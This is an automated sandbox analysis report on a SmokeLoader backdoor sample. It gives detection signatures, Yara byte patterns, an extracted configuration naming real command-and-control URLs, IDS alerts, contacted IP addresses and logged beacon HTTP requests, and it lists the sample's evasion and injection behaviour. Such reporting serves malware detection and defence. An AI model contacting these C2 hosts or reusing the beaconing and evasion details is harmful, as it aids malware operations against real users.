Edit tour

Windows Analysis Report
FyDBXJE74v.exe

Overview

General Information

Sample name:	FyDBXJE74v.exe renamed because original name is a hash value
Original sample name:	497859eed941e073a43e8291908e6494.exe
Analysis ID:	1532550
MD5:	497859eed941e073a43e8291908e6494
SHA1:	8136e8e148deeb6c9d18f8300f47e7b3a43b4290
SHA256:	8484619768f32fb9368cc46bc15a16cf99c98e95a2a605068adf5dd71090e0c7
Tags:	exeSocks5Systemzuser-abuse_ch
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected SmokeLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to read the PEB

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Sigma detected: Execution of Suspicious File Type Extension

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

FyDBXJE74v.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\FyDBXJE74v.exe" MD5: 497859EED941E073A43E8291908E6494)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

wsbgrgh (PID: 7956 cmdline: C:\Users\user\AppData\Roaming\wsbgrgh MD5: 497859EED941E073A43E8291908E6494)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1827444929.0000000002C9D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x39f4:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1827317925.0000000002C41000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1827317925.0000000002C41000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1827175401.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1827175401.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.2069915449.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000005.00000002.2069997356.0000000002E11000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2069997356.0000000002E11000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1827149563.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000005.00000002.2070115442.0000000002E4C000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x3b2c:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000005.00000002.2069943713.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2069943713.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\wsbgrgh, CommandLine: C:\Users\user\AppData\Roaming\wsbgrgh, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wsbgrgh, NewProcessName: C:\Users\user\AppData\Roaming\wsbgrgh, OriginalFileName: C:\Users\user\AppData\Roaming\wsbgrgh, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\wsbgrgh, ProcessId: 7956, ProcessName: wsbgrgh

Suricata Signatures

ET MALWARE Suspected Smokeloader Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T17:02:34.009237+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49736	78.89.199.216	80	TCP
2024-10-13T17:02:35.260507+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49737	78.89.199.216	80	TCP
2024-10-13T17:02:36.675576+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49738	78.89.199.216	80	TCP
2024-10-13T17:02:37.879607+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49739	78.89.199.216	80	TCP
2024-10-13T17:02:39.110270+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49740	78.89.199.216	80	TCP
2024-10-13T17:02:40.315350+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49741	78.89.199.216	80	TCP
2024-10-13T17:02:41.719962+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49742	78.89.199.216	80	TCP
2024-10-13T17:02:43.127590+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49743	78.89.199.216	80	TCP
2024-10-13T17:02:44.418920+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49744	78.89.199.216	80	TCP
2024-10-13T17:02:45.652054+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49745	78.89.199.216	80	TCP
2024-10-13T17:02:46.866023+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49746	78.89.199.216	80	TCP
2024-10-13T17:02:48.088816+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49747	78.89.199.216	80	TCP
2024-10-13T17:02:49.324243+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49748	78.89.199.216	80	TCP
2024-10-13T17:02:50.631889+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49749	78.89.199.216	80	TCP
2024-10-13T17:02:51.847825+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49750	78.89.199.216	80	TCP
2024-10-13T17:02:53.053024+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49751	78.89.199.216	80	TCP
2024-10-13T17:02:54.269862+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49752	78.89.199.216	80	TCP
2024-10-13T17:02:55.483123+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49753	78.89.199.216	80	TCP
2024-10-13T17:02:56.676550+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49754	78.89.199.216	80	TCP
2024-10-13T17:02:58.136557+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49756	78.89.199.216	80	TCP
2024-10-13T17:02:59.375455+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49768	78.89.199.216	80	TCP
2024-10-13T17:03:00.567671+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49774	78.89.199.216	80	TCP
2024-10-13T17:03:01.795567+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49785	78.89.199.216	80	TCP
2024-10-13T17:03:03.055928+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49794	78.89.199.216	80	TCP
2024-10-13T17:03:04.302004+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49802	78.89.199.216	80	TCP
2024-10-13T17:03:05.654853+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49810	78.89.199.216	80	TCP
2024-10-13T17:03:06.907800+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49819	78.89.199.216	80	TCP
2024-10-13T17:03:08.190298+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49828	78.89.199.216	80	TCP
2024-10-13T17:03:09.445903+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49836	78.89.199.216	80	TCP
2024-10-13T17:03:10.849624+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49845	78.89.199.216	80	TCP
2024-10-13T17:03:12.157474+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49856	78.89.199.216	80	TCP
2024-10-13T17:03:13.543698+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49864	78.89.199.216	80	TCP
2024-10-13T17:03:14.797727+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49873	78.89.199.216	80	TCP
2024-10-13T17:03:15.976762+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49882	78.89.199.216	80	TCP
2024-10-13T17:03:17.244744+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49890	78.89.199.216	80	TCP
2024-10-13T17:03:18.612428+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49896	78.89.199.216	80	TCP
2024-10-13T17:04:28.029229+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50038	78.89.199.216	80	TCP
2024-10-13T17:04:34.140280+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50039	78.89.199.216	80	TCP
2024-10-13T17:04:39.391353+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50040	78.89.199.216	80	TCP
2024-10-13T17:04:44.509898+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50041	78.89.199.216	80	TCP
2024-10-13T17:04:50.069868+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50042	78.89.199.216	80	TCP
2024-10-13T17:04:55.760104+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50043	78.89.199.216	80	TCP
2024-10-13T17:05:01.475818+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50044	78.89.199.216	80	TCP
2024-10-13T17:05:06.987167+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50045	109.175.29.39	80	TCP
2024-10-13T17:05:11.639706+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50046	109.175.29.39	80	TCP
2024-10-13T17:05:16.825285+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50047	109.175.29.39	80	TCP
2024-10-13T17:05:23.062242+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50048	109.175.29.39	80	TCP
2024-10-13T17:05:28.723373+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50049	109.175.29.39	80	TCP
2024-10-13T17:05:34.540144+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50050	109.175.29.39	80	TCP
2024-10-13T17:05:40.583026+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50051	109.175.29.39	80	TCP
2024-10-13T17:05:45.894239+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50052	109.175.29.39	80	TCP
2024-10-13T17:05:50.727891+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50053	109.175.29.39	80	TCP
2024-10-13T17:05:56.082119+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50054	109.175.29.39	80	TCP
2024-10-13T17:06:01.188741+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50055	109.175.29.39	80	TCP
2024-10-13T17:06:06.774445+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50056	109.175.29.39	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: FyDBXJE74v.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\wsbgrgh

Avira: detection malicious, Label: HEUR/AGEN.1312571

Found malware configuration

Source: 00000000.00000002.1827175401.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Multi AV Scanner detection for domain / URL

Source: nwgrus.ru	Virustotal: Detection: 12%			Perma Link
Source: http://nwgrus.ru/tmp/index.php	Virustotal: Detection: 16%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\wsbgrgh	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Virustotal: Detection: 41%			Perma Link

Multi AV Scanner detection for submitted file

Source: FyDBXJE74v.exe	ReversingLabs: Detection: 39%
Source: FyDBXJE74v.exe	Virustotal: Detection: 41%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\wsbgrgh

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: FyDBXJE74v.exe

Joe Sandbox ML: detected

Source: FyDBXJE74v.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\FyDBXJE74v.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49768 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49774 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49785 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49753 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49802 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49756 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49751 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49819 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49873 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49754 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49794 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49845 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49737 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49856 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49828 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49896 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49864 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49836 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49890 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49882 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49810 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50042 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50056 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50041 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50044 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50040 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50043 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50052 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50051 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50048 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50046 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50038 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50045 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50039 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50053 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50049 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50054 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50055 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50047 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50050 -> 109.175.29.39:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 109.175.29.39 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 78.89.199.216 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://nwgrus.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://tech-servers.in.net/tmp/index.php
Source: Malware configuration extractor	URLs: http://unicea.ws/tmp/index.php

Source: Joe Sandbox View	IP Address: 109.175.29.39 109.175.29.39
Source: Joe Sandbox View	IP Address: 78.89.199.216 78.89.199.216

Source: Joe Sandbox View	ASN Name: BIHNETBIHNETAutonomusSystemBA BIHNETBIHNETAutonomusSystemBA
Source: Joe Sandbox View	ASN Name: WATANIYATELECOM-ASKW WATANIYATELECOM-ASKW

Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://procusohdnplkcl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yagmckrhrxidkkt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dricwaygwumvuqyx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dvywoyvbihbnwwjn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mbmyqakevfccgv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://clrhahncwuyc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fxjvbidmvidvfvuu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qfasgfhewcyw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 217Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ajnjimgspja.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://orfuocjxhujvp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sukwfdfgeltdloqp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cspwoprndoye.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qtrqfgpakuyxgovn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cmqaenxsxeyowd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: nwgrus.ru
